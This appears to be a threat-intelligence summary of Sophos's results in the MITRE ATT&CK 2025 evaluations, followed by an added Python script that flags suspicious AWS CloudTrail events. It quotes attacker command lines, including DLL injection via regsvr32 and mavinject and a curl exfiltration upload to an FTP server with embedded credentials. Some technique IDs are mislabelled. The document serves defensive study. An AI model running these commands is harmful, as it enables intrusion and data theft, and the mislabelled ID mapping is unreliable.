Game of clones: Sophos and the MITRE ATT&CK Enterprise 2025 Evaluations

Key points

  • Sophos participated in MITRE ATT&CK Enterprise Evaluations 2025, covering two emulated threat profiles: SCATTERED SPIDER (cybercrime, cloud pivot) and MUSTANG PANDA (espionage, PlugX/Toneshell-style payloads).
  • SCATTERED SPIDER emulation used AiTM phishing to steal SSO session cookies, replayed those cookies to enroll devices and access on-premises and AWS consoles without MFA.
  • The SCATTERED SPIDER scenario demonstrated AWS abuse: console enumeration, Systems Manager SendCommand/AWS-RunPowerShellScript, creation of an administrative IAM user (ahightower), EC2 provisioning, and secret discovery via Secrets Manager.
  • MUSTANG PANDA emulations comprised ORPHEUS (TONESHELL-like chain using LNK + DLL sideloading, mavinject process injection, VSCode tunnels, NTDS.dit dumping) and PERSEUS (HTML smuggling delivering PlugX/SmugX via MSI sideloading, collection with WinRAR, exfiltration with curl to FTP).
  • Common attacker tooling and techniques used across scenarios included publicly available/open-source tools (ADExplorer, trufflehog, jecretz, Tactical RMM, wstunnel, AirByte, CyberDuck), living-off-the-land binaries (regsvr32, curl, rar), and covert channels (VSCode tunnels, WebSocket tunnels via wstunnel).
  • Sophos XDR detections captured many stages (cookie replay, AWS enumeration, Systems Manager command execution, Tactical RMM installation, wstunnel usage, S3 object retrieval, and self-deletion), while the report notes minor deviations from real-world reporting in some scenario details.

MITRE Techniques

  • [T1566.001] Spearphishing Link – Initial access via a targeted email linking to an AiTM page: ‘ACTION: SSO Updates Completed – Reauthentication Needed.’
  • [T1539] Steal Web Session Cookie – Session replay used to obtain SSO session cookies and authenticate without prompting: ‘When tlannister authenticated to the AiTM site, the threat actor obtained valid static credentials and Single Sign On (SSO) session cookies.’
  • [T1078] Valid Accounts – Use of stolen SSO cookies and device registration to access integrated applications and AWS console: ‘Replaying the stolen cookies provided access to the SSO solution, with a valid account for the organization.’
  • [T1021.001] Remote Services: RDP – Remote Desktop used to access an on-prem host (dragongate) after SSO device enrollment: ‘They then successfully connected to the host dragongate via Remote Desktop (RDP).’
  • [T1082] System Information Discovery – Basic discovery commands executed via cmd.exe (whoami, ping, wmic product get name, version): ‘whoami: returns active user’s domain and username’ and ‘wmic product get name, version.’
  • [T1087] Account Discovery – Active Directory enumeration with ADExplorer to list Domain Admins and admin groups: ‘downloaded the Active Directory enumeration tool ADExplorer … to explore administrator groups.’
  • [T1574] Hijack Execution Flow (DLL side-loading) – DLL sideloading used to execute malicious payloads via legitimate signed binaries (EssosUpdate.exe / wsdebug_host.exe and libcurl.dll): ‘the binary EssosUpdate.exe – a legitimate Windows application … that sideloaded a malicious DLL, wsdapi.dll.’
  • [T1218.011] Signed Binary Proxy Execution (regsvr32) – regsvr32 used to re-execute the sideloaded DLL: ‘C:\Windows\System32\regsvr32.exe /s "C:\Users\htargaryen\Downloads\wsdapi.dll"’
  • [T1055] Process Injection – mavinject used to inject wsdapi.dll into waitfor.exe for C2 persistence and execution: ‘mavinject.exe 8344 /INJECTRUNNING "C:\Users\htargaryen\Downloads\wsdapi.dll"’
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Remote PowerShell commands executed via AWS Systems Manager document AWS-RunPowerShellScript: ‘the threat actor ran the AWS Systems Manager document AWS-RunPowerShellScript to execute a PowerShell command on multiple instances.’
  • [T1021] Remote Services (PsExec) – PsExec used for lateral movement to drop and execute CodeHelper.bat and establish a VSCode tunnel: ‘The ORPHEUS threat actor used PsExec for lateral movement, to drop and execute the script CodeHelper.bat.’
  • [T1553.002] Subvert Cloud Provider Trust (SSO/SAML abuse) – SAML-based SSO was used to assume roles and access the AWS console without MFA: ‘AwsConsoleSignIn event … assumed an SSO role via the Authentik SAML provider … A login via SAML, but without multifactor authentication (MFA).’
  • [T1530] Data from Cloud Storage Object (exfiltration to S3) – Data staged to an S3 bucket and transferred to an attacker-controlled S3 bucket in another account using CyberDuck: ‘transferred files from the staging S3 bucket in the targeted organization’s AWS account to an attacker-controlled S3 bucket in another AWS account.’
  • [T1041] Exfiltration Over C2 Channel / Exfiltration Over Other Network Medium – Exfiltration using AirByte to stage files and curl/FTP to transfer archives to an attacker FTP server: ‘curl.exe -T … ftp://ftp_user:Gracious-Coat@[IP]/dp/ --ftp-create-dirs’ and ‘AirByte … staged files … to an S3 bucket.’
  • [T1204.002] User Execution: Malicious File – Initial access via malicious Office document and LNK that executed a sideloaded binary: ‘embedded link … download of the archive file … contained a LNK file … which executed the binary EssosUpdate.exe.’
  • [T1620] Cloud API Monitoring / Discovery (Secrets Manager access) – Secrets Manager ListSecrets and GetSecretValue calls used to discover and decrypt a GitLab PAT: ‘invoking the AWS Secrets Manager ListSecrets command … BatchGetSecretValue and GetSecretValue … Gitlab Personal Access Token secret for the user atargaryen … DecryptValue.’
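The AWS stages listed above (SAML console sign-in without MFA, Systems Manager SendCommand with AWS-RunPowerShellScript, creation of an administrative IAM user, and Secrets Manager ListSecrets followed by GetSecretValue) all leave CloudTrail records, which is where a defender would look for them. The following is an added example, not code from Sophos or from the MITRE evaluation, that runs four simple triage rules over constructed CloudTrail-style records. The event field names follow the CloudTrail record layout (`eventName`, `eventSource`, `userIdentity.arn`, `requestParameters`, `additionalEventData`); the account ids, instance ids, timestamps and ARNs are made up, and the benign events are included only to show what the rules ignore.

```python
"""Triage constructed CloudTrail-style records for the AWS stages of the
SCATTERED SPIDER emulation. Added example; all sample values are made up."""
import json

# Constructed sample principal ARNs (illustrative, not from the report).
ACTOR = "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_Admin/tlannister"
BENIGN = "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_ReadOnly/jsnow"
SAML = "arn:aws:iam::111111111111:saml-provider/Authentik"

# Constructed sample events (only the fields the rules read are present).
SAMPLE_EVENTS = [
    {"eventTime": "2025-01-10T09:00:01Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "userIdentity": {"arn": ACTOR},
     "additionalEventData": {"MFAUsed": "No", "SamlProviderArn": SAML},
     "responseElements": {"ConsoleLogin": "Success"}},
    {"eventTime": "2025-01-10T09:05:12Z", "eventSource": "ssm.amazonaws.com",
     "eventName": "SendCommand", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"documentName": "AWS-RunPowerShellScript",
                           "instanceIds": ["i-0aaa", "i-0bbb", "i-0ccc"]}},
    {"eventTime": "2025-01-10T09:20:40Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"userName": "ahightower"}},
    {"eventTime": "2025-01-10T09:21:03Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"userName": "ahightower",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventTime": "2025-01-10T10:02:00Z", "eventSource": "secretsmanager.amazonaws.com",
     "eventName": "ListSecrets", "userIdentity": {"arn": ACTOR}},
    {"eventTime": "2025-01-10T10:02:30Z", "eventSource": "secretsmanager.amazonaws.com",
     "eventName": "GetSecretValue", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"secretId": "gitlab/pat/atargaryen"}},
    # Benign activity: an SSO login that did use MFA, and a ListSecrets with no
    # follow-up read. Neither should produce a finding.
    {"eventTime": "2025-01-10T08:30:00Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "userIdentity": {"arn": BENIGN},
     "additionalEventData": {"MFAUsed": "Yes", "SamlProviderArn": SAML},
     "responseElements": {"ConsoleLogin": "Success"}},
    {"eventTime": "2025-01-10T08:45:00Z", "eventSource": "secretsmanager.amazonaws.com",
     "eventName": "ListSecrets", "userIdentity": {"arn": BENIGN}},
]


def principal(ev):
    """Return the calling identity's ARN, or 'unknown' if the record lacks one."""
    return ev.get("userIdentity", {}).get("arn", "unknown")


def find_saml_logins_without_mfa(events):
    """Successful federated (SAML) console sign-ins where MFAUsed is 'No'."""
    hits = []
    for ev in events:
        extra = ev.get("additionalEventData", {})
        if (ev.get("eventName") == "ConsoleLogin" and "SamlProviderArn" in extra
                and extra.get("MFAUsed") == "No"
                and ev.get("responseElements", {}).get("ConsoleLogin") == "Success"):
            hits.append(principal(ev))
    return hits


def find_ssm_script_execution(events, documents=("AWS-RunPowerShellScript", "AWS-RunShellScript")):
    """SSM SendCommand calls using script-execution documents; reports the instance count."""
    hits = []
    for ev in events:
        params = ev.get("requestParameters", {})
        if (ev.get("eventSource") == "ssm.amazonaws.com" and ev.get("eventName") == "SendCommand"
                and params.get("documentName") in documents):
            hits.append((principal(ev), params["documentName"], len(params.get("instanceIds", []))))
    return hits


def find_admin_user_creation(events):
    """CreateUser followed by AttachUserPolicy granting AdministratorAccess to that user."""
    created, hits = set(), []
    for ev in events:  # caller passes events in chronological order
        if ev.get("eventSource") != "iam.amazonaws.com":
            continue
        params = ev.get("requestParameters", {})
        name = params.get("userName")
        if ev.get("eventName") == "CreateUser" and name:
            created.add(name)
        elif (ev.get("eventName") == "AttachUserPolicy" and name in created
              and params.get("policyArn", "").endswith("/AdministratorAccess")):
            hits.append((principal(ev), name))
    return hits


def find_secret_harvesting(events):
    """ListSecrets followed by GetSecretValue/BatchGetSecretValue from the same principal."""
    listed, hits = set(), []
    for ev in events:
        if ev.get("eventSource") != "secretsmanager.amazonaws.com":
            continue
        who = principal(ev)
        if ev.get("eventName") == "ListSecrets":
            listed.add(who)
        elif ev.get("eventName") in ("GetSecretValue", "BatchGetSecretValue") and who in listed:
            params = ev.get("requestParameters", {})
            hits.append((who, params.get("secretId") or params.get("secretIdList") or "?"))
    return hits


def triage(events):
    """Run all rules over the records, sorted by eventTime so sequence rules work."""
    ordered = sorted(events, key=lambda e: e.get("eventTime", ""))
    return {
        "saml_login_without_mfa": find_saml_logins_without_mfa(ordered),
        "ssm_script_execution": find_ssm_script_execution(ordered),
        "admin_user_created": find_admin_user_creation(ordered),
        "secret_harvesting": find_secret_harvesting(ordered),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2))
```

The two sequence rules (user creation, secret harvesting) deliberately correlate on the same principal across records rather than alerting on a single call, because a lone ListSecrets or CreateUser is routine in most accounts; the MFA rule is the one that would fire first in the emulated chain, since the cookie replay produced a console session that never presented a second factor.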

Indicators of Compromise

  • [Email address] phishing and impersonation – it@kingslanding-it[.]net (spearphishing AiTM link).
  • [Domains] impersonation and tooling URLs – kingslanding-it[.]net, kingslanding-hr[.]com (Tactical RMM configuration URL impersonating kingslanding).
  • [User accounts / IAM] account names observed in attack flows – tlannister (compromised SSO user), ahightower (created IAM user), atargaryen (GitLab PAT target).
  • [Hostnames / Instances] on-prem and cloud hosts – dragongate (RDP access), CITADEL (file server with Z: share), goldroad (attacker-provisioned EC2 bastion).
  • [File names / Installers] malicious or abused binaries and payloads – EssosUpdate.exe, wsdapi.dll, 2025p2.msi, gup.exe, WinGUpdate.dat, libcurl.dll, and prpbg.dat.bak.1.
  • [Tools / utilities] attacker or reconnaissance tooling – wstunnel (WebSocket tunnel), trufflehog, jecretz, Tactical RMM, AirByte, CyberDuck (used for staging and exfiltration).
  • [Exfiltration endpoints / credentials] FTP and S3 transfer indicators – ftp://ftp_user:Gracious-Coat@[IP]/do/ (FTP exfiltration command) and attacker-controlled S3 bucket (files transferred between AWS accounts).
Read more: https://news.sophos.com/en-us/2025/12/15/game-of-clones-sophos-and-the-mitre-attck-enterprise-2025-evaluations/